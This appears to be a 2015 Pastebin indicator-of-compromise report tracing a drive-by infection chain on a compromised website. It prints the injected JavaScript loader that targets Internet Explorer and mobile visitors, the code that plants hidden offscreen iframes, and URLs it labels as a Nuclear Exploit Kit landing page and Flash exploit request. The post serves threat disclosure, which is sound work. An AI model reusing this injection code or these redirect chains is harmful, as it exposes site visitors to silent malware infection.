API tools faq
paste
malwageddon

IOC - www.projectrace.com - 2015-09-07

malwageddon
Sep 7th, 2015
247
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 2.89 KB | None | 0 0
raw download clone embed print report
  1. <!-- http://www.projectrace.com/tag/beyonce contans the following JS section. Note request for 'http://projectrace.com/historyandresults/main_configs/watch.php' -->
  2.  
  3. <!--visitorTracker--><script type="text/javascript" id="id_2446571">
  4. var visitortrackerin = setInterval(function(){
  5.     if(document.body != null && typeof document.body != "undefined"){
  6.         clearInterval(visitortrackerin);
  7.         if(typeof window["globalvisitor"] == "undefined"){
  8.             window["globalvisitor"] = 1;
  9.             var isIE = visitortrackerde();
  10.             var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
  11.             if(visitorTracker_isMob()){
  12.               var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://projectrace.com/historyandresults/main_configs/watch.php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
  13.             }else{
  14.                 if((isIE && !isChrome && !visitorTracker_isMob())){
  15.                     var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://projectrace.com/historyandresults/main_configs/watch.php"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
  16.                 }
  17.             }
  18.         }
  19.         visitortracksdel();
  20.     }
  21. },100);
  22.  
  23. <!-- When 'http://projectrace.com/historyandresults/main_configs/watch.php' is requested, the following code is delivered. Note the value of 'iframe_name' variable -->
  24.  
  25. function trackfunc(){
  26.         var iframe_name = "<div style='position:absolute;left:-3532px;'><iframe width='10px' src='http://vovinutrysiki.gq/052F' height='10px'></iframe></div>";
  27.         var divs_name = document.getElementsByTagName('div');
  28.         var isIE = visitortrackerde();
  29.         var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
  30.         if(isIE && !isChrome){
  31.             if(divs_name.length == 0){
  32.                 document.body.innerHTML = document.body.innerHTML+iframe_name;
  33.             }else{
  34.                 var dl_name = divs_name.length;
  35.                 var mid_name = Math.floor((dl_name/2));
  36.                 divs_name[mid_name].innerHTML = divs_name[mid_name].innerHTML+iframe_name;
  37.             }
  38.         }
  39.     }
  40.  
  41. <!-- Request for 'http://vovinutrysiki.gq/052F' returns the following iframe -->
  42.  
  43. <html>
  44. <div style='left:-2874px;position:absolute;'>
  45.     <iframe height='6px' src='http://zalypkavovana.cf/search?q=5d97a47&A3n=86eee856fd&Ye2hiYw=e&2hd=aWV9TVxtF&Osh0=gBf&W9Itm9D=fA&GGCr=dV9WH&RL8=cAxPU&RPwp3zH=bXVZQQgxFBE1NUw9AQFpWR' border='1' width='9px' frameBorder='0'></iframe>
  46. </div>
  47.  
  48. </html>
  49.  
  50. <!-- 'http://zalypkavovana.cf/search?q=5d97a47&A3n=86eee856fd&Ye2hiYw=e&2hd=aWV9TVxtF&Osh0=gBf&W9Itm9D=fA&GGCr=dV9WH&RL8=cAxPU&RPwp3zH=bXVZQQgxFBE1NUw9AQFpWR' is a landing page for Nuclear Exploit Kit. Below is an example of Adobe Flash Player exploit request -->
  51.  
  52. http://zalypkavovana.cf/cart?RJtDHXC=fLVA8K&VQR=5f44e083c&M8s7=aVUlHTg5eV0FYTldFAQRLSAJVSUFc&I6X=d1QL&6cc=eAwl&Owc=2c8fc0fb3d&EJt=cGAFAXAQEDTlINBAABA&6tXJa=bUxVWRlBZU01aVk0GAE0MAh8
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!